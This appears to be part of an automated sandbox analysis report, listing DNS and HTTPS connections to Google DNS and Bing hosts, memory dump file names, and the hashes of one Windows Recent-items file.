US 8.8.8.8:53 219.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/564-1-0x00007FFC7AF8D000-0x00007FFC7AF8E000-memory.dmp

memory/564-0-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-3-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-2-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-4-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-8-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-7-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-6-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-11-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-14-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-13-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-15-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-18-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-17-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-16-0x00007FFC38900000-0x00007FFC38910000-memory.dmp

memory/564-12-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-10-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-9-0x00007FFC38900000-0x00007FFC38910000-memory.dmp

memory/564-5-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-36-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-40-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-43-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-44-0x00007FFC7AF8D000-0x00007FFC7AF8E000-memory.dmp

memory/564-45-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-49-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-50-0x00007FF7121B0000-0x00007FF7121B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 eb8ef0f7820b8209b5ac29ed9e849437
SHA1 4d435b72cc7e9dac30d6932c58f74969ade683c6
SHA256 f77700518a75d92cff849487ceb56e2280479d09b391bdfc3b47e75c4dee168a
SHA512 7be49ee1fd904682de4263b722a05210947805e0ce48a04fa16f5829ac347b6688e3004294dc727566ece06dc10db753fddddb523f3fd08ca036c1af80332b3f

memory/564-82-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-83-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-85-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-84-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-86-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp